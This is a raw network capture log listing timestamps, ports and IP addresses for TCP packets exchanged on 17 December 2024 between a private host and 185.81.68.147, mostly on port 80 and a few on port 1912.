                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.485436916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.486015081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.488008022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.488116980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.488221884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.490885973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.491024017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.491147995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.493699074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.493798018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.493999004 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.496519089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.496797085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.498030901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.499427080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.499506950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.499566078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.502309084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.502424002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.502489090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.505172968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.505225897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.505425930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.508409977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.508460999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.508563995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.510845900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.674350977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.674501896 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.676013947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.676062107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.676125050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.677187920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.677299023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.677367926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.678366899 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.679147005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.679194927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.679233074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.681140900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.681303024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.681329012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.683080912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.683240891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.683334112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.685439110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.685600996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.685693026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.687436104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.687525988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.687583923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.689341068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.689382076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.689533949 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.691194057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.691349983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.691430092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.692816019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.692914963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.692977905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.694397926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.694502115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.694571972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.696228027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.696394920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.696443081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.697741985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.697807074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.697858095 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.699035883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.699239969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.699318886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.700702906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.700898886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.700972080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.702487946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.702579975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.702763081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.704185009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.704266071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.704278946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.705184937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.705288887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.705352068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.706271887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.706336021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.706387997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.707288027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.707366943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.707418919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.708300114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.708364964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.708473921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.709342003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.709451914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.709472895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.711251020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.711270094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.711360931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.713206053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.713217974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.713229895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.713241100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.713269949 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.713305950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.713510990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.713644981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.713713884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.714556932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.714664936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.715075970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.715941906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.715955019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.716005087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.717020035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.717031956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.717052937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.717817068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.717828989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.717926979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.718723059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.718830109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.719274044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.719769001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.719885111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.871587038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.872288942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.872344971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.872785091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.873265028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.873285055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.873601913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.874209881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.874322891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.874501944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.875154018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.875220060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.875346899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.876106024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.876502037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.876796961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.877098083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.877162933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.877276897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.878019094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.878099918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.878309965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.878968954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.879043102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.879151106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.880007029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.880074024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.880162954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.880986929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.881050110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.881294966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.882021904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.892901897 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:05.926023006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.012635946 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.022880077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.022957087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.023063898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.023139000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.023205996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.023245096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.024178982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.024260998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.024355888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.025106907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.025270939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.025368929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.026017904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.026084900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.026184082 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.027031898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.027127981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.027215004 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.027903080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.027966976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.028135061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.028853893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.028974056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.029243946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.029798031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.029973984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.030227900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.030797958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.030872107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.030978918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.031755924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.031886101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.032002926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.032672882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.032783031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.032891035 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.033611059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.033768892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.033868074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.034605980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.034634113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.034877062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.035537004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.035629988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.035722017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.036511898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.036545992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.036639929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.037523031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.037686110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.037776947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.038615942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.038801908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.038908005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.039850950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.039896965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.039999008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.040597916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.040718079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.040819883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.041344881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.041409969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.041512012 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.224060059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.224807978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.224901915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.225004911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.225797892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.225902081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.225996971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.226696014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.226814985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.226912975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.227674007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.227822065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.227926016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.228666067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.228759050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.228862047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.229655027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.229764938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.229865074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.230530977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.230644941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.230737925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.231472969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.232028961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.232124090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.232584953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.232659101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.232784986 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.233402014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.233937979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.234031916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.234476089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.234534979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.234627962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.235306025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.235480070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.235574007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.236262083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.236449003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.236548901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.237210035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.237348080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.237447977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.238214016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.238272905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.238372087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.239090919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.239209890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.239303112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.240071058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.240140915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.240236998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.240992069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.241041899 CET8049709185.81.68.147192.168.2.8
